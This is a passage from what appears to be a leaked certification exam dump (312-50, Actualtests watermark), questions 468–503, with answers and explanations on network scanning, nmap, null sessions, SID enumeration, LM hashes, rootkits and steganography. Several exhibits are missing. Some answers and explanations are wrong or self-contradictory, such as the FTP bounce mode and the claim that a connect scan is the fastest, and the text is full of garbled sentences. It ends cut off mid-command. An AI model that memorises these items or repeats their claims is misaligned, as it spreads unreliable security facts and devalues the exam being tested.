QUESTION 468:

Actualtests.com - The Power of Knowing

312-50
You are footprinting the www.xsecurity.com domain using the Google Search
Engine. You would like to determine what sites link to www.xsecurity .com at the first level of revelance.
Which of the following operator in Google search will you use to achieve this?
A. Link: www.xsecurity.com
B. serch?l:www.xsecurity.com
C. level1.www.security.com
D. pagerank:www.xsecurity.com
Answer: A
Explanation:
The query [link:] will list webpages that have links to the specified webpage. For instance, [link:www.google.com] will list webpages that have links pointing to the
Google homepage. Note there can be no space between the "link:" and the web page url. QUESTION 469:
While doing fast scan using -F option, which file is used to list the range of ports to scan by nmap?
A. services
B. nmap-services
C. protocols
D. ports
Answer: B
Explanation: Nmap uses the nmap-services file to provide additional port detail for almost every scanning method. Every time a port is referenced, it's compared to an available description in this support file. If the nmap-services file isn't available, nmap reverts to the /etc/services file applicable for the current operating system.
QUESTION 470:
Bob is a Junior Administrator at Certkiller .com is searching the port number of
POP3 in a file. The partial output of the file is look like:
In which file he is searching?

Actualtests.com - The Power of Knowing

312-50

A. services
B. protocols
C. hosts
D. resolve.conf
Answer: A
Explanation: The port numbers on which certain standard services are offered are defined in the RFC 1700 Assigned Numbers. The /etc/services file enables server and client programs to convert service names to these numbers -ports. The list is kept on each host and it is stored in the file /etc/services.
QUESTION 471:
Exhibit:

Please study the exhibit carefully.
Which Protocol maintains the communication on that way?
A. UDP
B. IP
C. TCP
D. ARP
E. RARP
Answer: C
Actualtests.com - The Power of Knowing

312-50

Explanation: A TCP connection is always initiated with the 3-way handshake, which establishes and negotiates the actual connection over which data will be sent.
QUESTION 472:
What are the four steps is used by nmap scanning?
A. DNS Lookup
B. ICMP Message
C. Ping
D. Reverse DNS lookup
E. TCP three way handshake
F. The Actual nmap scan
Answer: A,C,D,F
Explanation: Nmap performs four steps during a normal device scan. Some of these steps can be modified or disabled using options on the nmap command line.
1.
If a hostname is used as a remote device specification, nmap will perform a DNS lookup prior to the scan.
2. Nmap pings the remote device. This refers to the nmap "ping" process, not
(necessarily) a traditional ICMP echo request.
3. If an IP address is specified as the remote device, nmap will perform a reverse DNS lookup in an effort to identify a name that might be associated with the IP address. This is the opposite process of what happens in step 1, where an IP address is found from a hostname specification.
4. Nmap executes the scan. Once the scan is over, this four-step process is completed.
Except for the actual scan process in step four, each of these steps can be disabled or prevented using different IP addressing or nmap options. The nmap process can be as
"quiet" or as "loud" as necessary!
QUESTION 473:
Your are trying the scan a machine located at ABC company's LAN named mail.abc.com. Actually that machine located behind the firewall. Which port is used by nmap to send the TCP synchronize frame to on mail.abc.com?
A. 443
B. 80
C. 8080
D. 23
Answer: A

Actualtests.com - The Power of Knowing

312-50
QUESTION 474:
Jenny a well known hacker scanning to remote host of 204.4.4.4 using nmap. She got the scanned output but she saw that 25 port states is filtered. What is the meaning of filtered port State?
A. Can Accessible
B. Filtered by firewall
C. Closed
D. None of above
Answer: B
Explanation:
The state is either open, filtered, closed, or unfiltered. Filtered means that a firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell whether it is open or closed.
QUESTION 475:
You want to scan the live machine on the LAN, what type of scan you should use?
A. Connect
B. SYN
C. TCP
D. UDP
E. PING
Answer: E
Explanation: The ping scan is one of the quickest scans that nmap performs, since no actual ports are queried. Unlike a port scan where thousands of packets are transferred between two stations, a ping scan requires only two frames. This scan is useful for locating active devices or determining if ICMP is passing through a firewall. QUESTION 476:
Which FTP transfer mode is required for FTP bounce attack?
A. Active Mode
B. Passive Mode
C. User Mode
D. Anonymous Mode
Answer: B
Actualtests.com - The Power of Knowing

312-50

Explanation: FTP bounce attack needs the server the support passive connections and the client program needs to use PORT command instead of the PASV command. QUESTION 477:
Nathalie would like to perform a reliable scan against a remote target. She is not concerned about being stealth at this point. Which of the following type of scans would be the most accurate and reliable?
A. A FIN Scan
B. A Half Scan
C. A UDP Scan
D. The TCP Connect Scan
Answer: D
Explanation: The connect() system call provided by your operating system is used to open a connection to every interesting port on the machine. If the port is listening, connect() will succeed, otherwise the port isn't reachable. One strong advantage to this technique is that you don't need any special privileges. This is the fastest scanning method supported by nmap, and is available with the -t (TCP) option. The big downside is that this sort of scan is easily detectable and filterable.
QUESTION 478:
John has performed a scan of the web server with NMAP but did not gather enough information to accurately identify which operating system is running on the remote host. How could you use a web server to help in identifying the OS that is being used? A. Telnet to an Open port and grab the banner
B. Connect to the web server with an FTP client
C. Connect to the web server with a browser and look at the web page
D. Telnet to port 8080 on the web server and look at the default page code
Answer: A
Explanation: Most Web servers politely identify themselves and the OS to anyone who asks.
QUESTION 479:
Mark works as a contractor for the Department of Defense and is in charge of network security. He has spent the last month securing access to his network from
Actualtests.com - The Power of Knowing

312-50 all possible entry points. He has segmented his network into several subnets and has installed firewalls all over the network. He has placed very stringent rules on all the firewalls, blocking everything in and out except ports that must be used. He does need to have port 80 open since his company hosts a website that must be accessed from the Internet. Mark is fairly confident of his perimeter defense, but is still worried about programs like Hping2 that can get into a network through convert channels. How should mark protect his network from an attacker using Hping2 to scan his internal network?
A. Blocking ICMP type 13 messages
B. Block All Incoming traffic on port 53
C. Block All outgoing traffic on port 53
D. Use stateful inspection on the firewalls
Answer: A
Explanation: An ICMP type 13 message is an ICMP timestamp request and waits for an ICMP timestamp reply. The remote node is right to do, still it would not be necessary as it is optional and thus many ip stacks ignore such packets.
Nevertheless, nmap again achived to make its packets unique by setting the originating timestamp field in the packet to 0.
QUESTION 480:
Lori has just been tasked by her supervisor conduct vulnerability scan on the corporate network. She has been instructed to perform a very thorough test of the network to ensure that there are no security holes on any of the machines. Lori's company does not own any commercial scanning products, so she decides to download a free one off the Internet. Lori has never done a vulnerability scan before, so she is unsure of some of the settings available in the software she downloaded. One of the option is to choose which ports that can be scanned. Lori wants to do exactly what her boos has told her, but she does not know ports should be scanned.
If Lori is supposed to scan all known TCP ports, how many ports should she select in the software?
A. 65536
B. 1024
C. 1025
D. Lori should not scan TCP ports, only UDP ports
Answer: A
Explanation: In both TCP and UDP, each packet header will specify a source port

Actualtests.com - The Power of Knowing

312-50 and a destination port, each of which is a 16-bit unsigned integer (i.e. ranging from
0 to 65535).
QUESTION 481:
Samantha has been actively scanning the client network for which she is doing a vulnerability assessment test. While doing a port scan she notices ports open in the
135 to 139 range. What protocol is most likely to be listening on those ports?
A. SMB
B. FTP
C. SAMBA
D. FINGER
Answer: A
Explanation: Port 135 is for RPC and 136-139 is for NetBIOS traffic. SMB is an upper layer service that runs on top of the Session Service and the Datagram service of NetBIOS.
QUESTION 482:
Paula works as the primary help desk contact for her company. Paula has just received a call from a user reporting that his computer just displayed a Blue Screen of Death screen and he ca no longer work. Paula walks over to the user's computer and sees the Blue Screen of Death screen. The user's computer is running Windows
XP, but the Blue screen looks like a familiar one that Paula had seen a Windows
2000 Computers periodically.
The user said he stepped away from his computer for only 15 minutes and when he got back, the Blue Screen was there. Paula also noticed that the hard drive activity light was flashing meaning that the computer was processing some thing. Paula knew this should not be the case since the computer should be completely frozen during a Blue screen. She checks the network IDS live log entries and notices numerous nmap scan alerts.
What is Paula seeing happen on this computer?
A. Paula's Network was scanned using FloppyScan
B. Paula's Netwrok was scanned using Dumpsec
C. There was IRQ conflict in Paula's PC
D. Tool like Nessus will cause BSOD
Answer: A
Explanation: Floppyscan is a dangerous hacking tool which can be used to portscan a system using a floppy disk Bootsup mini Linux Displays Blue screen of death

Actualtests.com - The Power of Knowing

312-50 screen Port scans the network using NMAP Send the results by e-mail to a remote server. QUESTION 483:
You are scanning the target network for the first time. You are able to detect few convention open ports. While attempting to perform conventional service identification by connecting to the open ports, the scan yields either bad or no result. As you are unsure of the protocols in use, you want to discover as many different protocols as possible. Which of the following scan options can help you achieve this?
A. Nessus sacn with TCP based pings
B. Netcat scan with the switches
C. Nmap scan with the P (ping scan) switch
D. Nmap with the O (Raw IP Packets switch
Answer: D
Explanation:
-sO IP protocol scans: This method is used to determine which IP protocols are supported on a host. The technique is to send raw IP packets without any further protocol header to each specified protocol on the target machine. If we receive an
ICMP protocol unreachable message, then the protocol is not in use. Otherwise we assume it is open. Note that some hosts (AIX, HP-UX, Digital UNIX) and firewalls may not send protocol unreachable messages.
QUESTION 484:
Jack is conducting a port scan of a target network. He knows that his target network has a web server and that a mail server is up and running. Jack has been sweeping the network but has not been able to get any responses from the remote target. Check all of the following that could be a likely cause of the lack of response?
A. The host might be down
B. UDP is filtered by a gateway
C. ICMP is filtered by a gateway
D. The TCP window Size does not match
E. The destination network might be down
F. The packet TTL value is too low and can't reach the target
Answer: A,C,E,F
Explanation: Wrong answers is B and D as sweeping a network uses ICMP

Actualtests.com - The Power of Knowing

312-50
QUESTION 485:
War dialing is one of the oldest methods of gaining unauthorized access to the target systems, it is one of the dangers most commonly forgotten by network engineers and system administrators. A hacker can sneak past all the expensive firewalls and IDS and connect easily into the network. Through wardialing an attacker searches for the devices located in the target network infrastructure that are also accessible through the telephone line.
'Dial backup' in routers is most frequently found in networks where redundancy is required. Dial-on-demand routing(DDR) is commonly used to establish connectivity as a backup.
As a security testers, how would you discover what telephone numbers to dial-in to the router?
A. Search the Internet for leakage for target company's telephone number to dial-in
B. Run a war-dialing tool with range of phone numbers and look for CONNECT
Response
C. Connect using ISP's remote-dial in number since the company's router has a leased line connection established with them
D. Brute force the company's PABX system to retrieve the range of telephone numbers to dial-in
Answer: B
Explanation: Use a program like Toneloc to scan the company's range of phone numbers. QUESTION 486:
The FIN flag is set and sent from host A to host B when host A has no more data to transmit (Closing a TCP connection). This flag releases the connection resources.
However, host A can continue to receive data as long as the SYN sequence number of transmitted packets from host B are lower than the packet segment containing the set FIN flag.
A. True
B. False
Answer: A
Explanation: For sequence number purposes, the SYN is considered to occur before the first actual data octet of the segment in which it occurs, while the FIN is considered to occur after the last actual data octet in a segment in which it occurs.
So packets receiving out of order will still be accepted.

Actualtests.com - The Power of Knowing

312-50
QUESTION 487:
Which type of scan does not open a full TCP connection?
A. Stealth Scan
B. XMAS Scan
C. Null Scan
D. FIN Scan
Answer: A
Explanation: Stealth Scan: Instead of completing the full TCP three-way-handshake a full connection is not made. A SYN packet is sent to the system and if a SYN/ACK packet is received it is assumed that the port on the system is active. In that case a
RST/ACK will be sent which will determined the listening state the system is in. If a
RST/ACK packet is received, it is assumed that the port on the system is not active.
QUESTION 488:
Gerald, the systems administrator for Hyped Enterprise, has just discovered that his network has been breached by an outside attacker. After performing routine maintenance on his servers, his discovers numerous remote tools were installed that no one claims to have knowledge of in his department.
Gerald logs onto the management console for his IDS and discovers an unknown IP address that scanned his network constantly for a week and was able to access his network through a high-level port that was not closed. Gerald traces the IP address he found in the IDS log to proxy server in Brazil.
Gerald calls the company that owns the proxy server and after searching through their logs, they trace the source to another proxy server in Switzerland. Gerald calls the company in Switzerland that owns the proxy server and after scanning through the logs again, they trace the source back to a proxy server in China.
What tool Geralds's attacker used to cover their tracks?
A. Tor
B. ISA
C. IAS
D. Cheops
Answer: A
Explanation: Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. It provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. Individuals can use it to keep remote Websites from tracking them and
Actualtests.com - The Power of Knowing

312-50 their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local Internet service providers (ISPs).
QUESTION 489:
Which of the following is a patch management utility that scans one or more computers on your network and alerts you if you important Microsoft Security patches are missing.It then provides links that enable those missing patches to be downloaded and installed.
A. MBSA
B. BSSA
C. ASNB
D. PMUS
Answer: A
Explanation: The Microsoft Baseline Security Analyzer (MBSA) is a tool put out by
Microsoft to help analyze security problems in Microsoft Windows. It does this by scanning the system for security problems in Windows, Windows components such as the IIS web server application, Microsoft SQL Server, and Microsoft Office. One example of an issue might be that permissions for one of the directories in the wwwroot folder of IIS could be set at too low a level, allowing unwanted modification of files from outsiders.
QUESTION 490:
You are conducting an idlescan manually using HPING2. During the scanning process, you notice that almost every query increments the IPID- regardless of the port being queried. One or two of the queries cause the IPID to increment by more than one value. Which of he following options would be a possible reason?
A. Hping2 can't be used for idlescanning
B. The Zombie you are using is not truly idle
C. These ports are actually open on the target system
D. A stateful inspection firewall is resetting your queries
Answer: B
Explanation: If the IPID increments more than one value that means that there has been network traffic between the queries so the zombie is not idle.
QUESTION 491:
While reviewing the results of a scan run against a target network you come across
Actualtests.com - The Power of Knowing

312-50 the following:

What was used to obtain this output?
A. An SNMP Walk
B. Hping2 diagnosis
C. A Bo2K System query
D. Nmap protocol/port scan
Answer: A
Explanation: The snmpwalk command is designed to perform a sequence of chained
GETNEXT requests automatically, rather than having to issue the necessary snmpgetnext requests by hand. The command takes a single OID, and will display a list of all the results which lie within the subtree rooted on this OID.
QUESTION 492:

Actualtests.com - The Power of Knowing

312-50

Which of the following nmap command in Linux procedures the above output?
A. sudo nmap -sP 192.168.0.1/24
B. root nmap -sA 192.168.0.1/24
C. run nmap -TX 192.168.0.1/24
D. launch nmap -PP 192.168.0.1/24
Answer: A
Explanation: This is an output from a ping scan. The option -sP will give you a ping scan of the 192.168.0.1/24 network.
QUESTION 493:
SNMP is a protocol used to query hosts, servers and devices about performance or health status data. Hackers have used this protocol for a long time to gather great amount of information about remote hosts. Which of the following features makes this possible?
A. It is susceptible to sniffing
B. It uses TCP as the underlying protocol
C. It is used by ALL devices on the market
D. It uses a community string sent as clear text
Answer: A,D
Actualtests.com - The Power of Knowing

312-50

Explanation: SNMP uses UDP, not TCP, and even though many devices uses SNMP not ALL devices use it and it can be disabled on most of the devices that does use it.
However SNMP is susceptible to sniffing and the community string (which can be said acts as a password) is sent in clear text.
QUESTION 494:
Jonathan being a keen administrator has followed all of the best practices he could find on securing his Windows Server. He renamed the Administrator account to a new name that can't be easily guessed but there remain people who attempt to compromise his newly renamed administrator account. How can a remote attacker decipher the name of the administrator account if it has been renamed?
A. The attacker guessed the new name
B. The attacker used the user2sid program
C. The attacker used to sid2user program
D. The attacker used NMAP with the V option
Answer: C
Explanation: User2sid.exe can retrieve a SID from the SAM (Security Accounts
Manager) from the local or a remote machine Sid2user.exe can then be used to retrieve the names of all the user accounts and more. These utilities do not exploit a bug but call the functions LookupAccountName and LookupAccountSid respectively. What is more these can be called against a remote machine without providing logon credentials save those needed for a null session connection.
QUESTION 495:
SNMP is a connectionless protocol that uses UDP instead of TCP packets? (True or
False)
A. True
B. False
Answer: A
Explanation: TCP and UDP provide transport services. But UDP was preferred.
This is due to TCP characteristics, it is a complicate protocol and it consume to many memory and CPU resources.
Where as UDP is easy to build and run. Into devices (repeaters and modems) vendors have built simple version of IP and UDP.
QUESTION 496:

Actualtests.com - The Power of Knowing

312-50
Maurine is working as a security consultant for Hinklemeir Associate. She has asked the Systems Administrator to create a group policy that would not allow null sessions on the network. The Systems Administrator is fresh out of college and has never heard of null sessions and does not know what they are used for. Maurine is trying to explain to the Systems Administrator that hackers will try to create a null session when footprinting the network.
Why would an attacker try to create a null session with a computer on a network?
A. Enumerate users shares
B. Install a backdoor for later attacks
C. Escalate his/her privileges on the target server
D. To create a user with administrative privileges for later use
Answer: A
Explanation: The Null Session is often referred to as the "Holy Grail" of Windows hacking. Listed as the number 5 windows vulnerability on the SANS/FBI Top 20 list, Null Sessions take advantage of flaws in the CIFS/SMB (Common Internet File
System/Server Messaging Block) architecture. You can establish a Null Session with a Windows (NT/2000/XP) host by logging on with a null user name and password.
Using these null connections allows you to gather the following information from the host: - List of users and groups
- List of machines
- List of shares
- Users and host SID' (Security Identifiers)
QUESTION 497:
Samuel is the network administrator of DataX communications Inc. He is trying to configure his firewall to block password brute force attempts on his network. He enables blocking the intruder's IP address for a period of 24 hours time after more than three unsuccessful attempts. He is confident that this rule will secure his network hackers on the Internet.
But he still receives hundreds of thousands brute-force attempts generated from various IP addresses around the world. After some investigation he realizes that the intruders are using a proxy somewhere else on the Internet which has been scripted to enable the random usage of various proxies on each request so as not to get caught by the firewall use.
Later he adds another rule to his firewall and enables small sleep on the password attempt so that if the password is incorrect, it would take 45 seconds to return to the user to begin another attempt. Since an intruder may use multiple machines to brute force the password, he also throttles the number of connections that will be prepared to accept from a particular IP address. This action will slow the intruder's attempts. Samuel wants to completely block hackers brute force attempts on his network.
Actualtests.com - The Power of Knowing

312-50
What are the alternatives to defending against possible brute-force password attacks on his site?
A. Enforce a password policy and use account lockouts after three wrong logon attempts even through this might lock out legit users
B. Enable the IDS to monitor the intrusion attempts and alert you by e-mail about the IP address of the intruder so that you can block them at the firewall manually
C. Enforce complex password policy on your network so that passwords are more difficult to brute force
D. You can't completely block the intruders attempt if they constantly switch proxies
Answer: D
Explanation: Without knowing from where the next attack will come there is no way of proactively block the attack. This is becoming a increasing problem with the growth of large bot nets using ordinary workstations and home computers in large numbers. QUESTION 498:
LAN Manager passwords are concatenated to 14 bytes and split in half. The two halves are hashed individually. If the password is 7 characters or less, than the second half of the hash is always:
A. 0xAAD3B435B51404EE
B. 0xAAD3B435B51404AA
C. 0xAAD3B435B51404BB
D. 0xAAD3B435B51404CC
Answer: A
Explanation: A problem with LM stems from the total lack of salting or cipher block chaining in the hashing process. To hash a password the first 7 bytes of it are transformed into an 8 byte odd parity DES key. This key is used to encrypt the 8 byte string "KGS!@". Same thing happens with the second part of the password.
This lack of salting creates two interesting consequences. Obviously this means the password is always stored in the same way, and just begs for a typical lookup table attack. The other consequence is that it is easy to tell if a password is bigger than 7 bytes in size. If not, the last 7 bytes will all be null and will result in a constant DES hash of 0xAAD3B435B51404EE.
QUESTION 499:
Travis works primarily from home as a medical transcriptions.
He just bought a brand new Dual Core Pentium Computer with over 3 GB of RAM.
He uses voice recognition software is processor intensive, which is why he bought
Actualtests.com - The Power of Knowing

312-50 the new computer. Travis frequently has to get on the Internet to do research on what he is working on. After about two months of working on his new computer, he notices that it is not running nearly as fast as it used to.
Travis uses antivirus software, anti-spyware software and always keeps the computer up-to-date with Microsoft patches.
After another month of working on the computer, Travis computer is even more noticeable slow. Every once in awhile, Travis also notices a window or two pop-up on his screen, but they quickly disappear. He has seen these windows show up, even when he has not been on the Internet. Travis is really worried about his computer because he spent a lot of money on it and he depends on it to work. Travis scans his through Windows Explorer and check out the file system, folder by folder to see if there is anything he can find. He spends over four hours pouring over the files and folders and can't find anything but before he gives up, he notices that his computer only has about 10 GB of free space available. Since has drive is a 200 GB hard drive,
Travis thinks this is very odd.
Travis downloads Space Monger and adds up the sizes for all the folders and files on his computer. According to his calculations, he should have around 150 GB of free space. What is mostly likely the cause of Travi's problems?
A. Travis's Computer is infected with stealth kernel level rootkit
B. Travi's Computer is infected with Stealth Torjan Virus
C. Travis's Computer is infected with Self-Replication Worm that fills the hard disk space D. Logic Bomb's triggered at random times creating hidden data consuming junk files
Answer: A
Explanation: A rootkit can take full control of a system. A rootkit's only purpose is to hide files, network connections, memory addresses, or registry entries from other programs used by system administrators to detect intended or unintended special privilege accesses to the computer resources.
QUESTION 500:
Which of the following is an attack in which a secret value like a hash is captured and then reused at a later time to gain access to a system without ever decrypting or decoding the hash.
A. Replay Attacks
B. Brute Force Attacks
C. Cryptography Attacks
D. John the Ripper Attacks
Answer: A
Explanation: A replay attack is a form of network attack in which a valid data
Actualtests.com - The Power of Knowing

312-50 transmission is maliciously or fraudulently repeated or delayed. This is carried out either by the originator or by an adversary who intercepts the data and retransmits it. QUESTION 501:
You are the IT Manager of a large legal firm in California. Your firm represents many important clients whose names always must remain anonymous to the public.
Your boss, Mr. Smith is always concerned about client information being leaked or revealed to the pres or public. You have just finished a complete security overhaul of your information system including an updated IPS, new firewall, email encryption and employee security awareness training. Unfortunately, many of your firm's clients do not trust technology to completely secure their information, so couriers routinely have to travel back and forth to and from the office with sensitive information. Your boss has charged you with figuring out how to secure the information the couriers must transport. You propose that the data be transferred using burned
CD's or USB flash drives. You initially think of encrypting the files, but decide against that method for fear the encryption keys could eventually be broken.
What software application could you use to hide the data on the CD's and USB flash drives? A. Snow
B. File Snuff
C. File Sneaker
D. EFS
Answer: A
Explanation: The Snow software developed by Matthew Kwan will insert extra spaces at the end of each line. Three bits are encoded in each line by adding between
0 and 7 spaces that are ignored by most display programs including web browsers.
QUESTION 502:
You are the security administrator for a large online auction company based out of
Los Angeles. After getting your ENSA CERTIFICATION last year, you have steadily been fortifying your network's security including training OS hardening and network security. One of the last things you just changed for security reasons was to modify all the built-in administrator accounts on the local computers of PCs and in Active Directory. After through testing you found and no services or programs were affected by the name changes.
Your company undergoes an outside security audit by a consulting company and they said that even through all the administrator account names were changed, the accounts could still be used by a clever hacker to gain unauthorized access. You argue with the auditors and say that is not possible, so they use a tool and show you
Actualtests.com - The Power of Knowing

312-50 how easy it is to utilize the administrator account even though its name was changed. What tool did the auditors use?
A. sid2user
B. User2sid
C. GetAcct
D. Fingerprint
Answer: A
Explanation: User2sid.exe can retrieve a SID from the SAM (Security Accounts
Manager) from the local or a remote machine Sid2user.exe can then be used to retrieve the names of all the user accounts and more.
QUESTION 503:
John Beetlesman, the hacker has successfully compromised the Linux System of
Agent Telecommunications, Inc's WebServer running Apache.He has downloaded sensitive documents and database files off the machine.
Upon performing various tasks, Beetlesman finally runs the following command on the Linux box before disconnecting.
for((i=0;i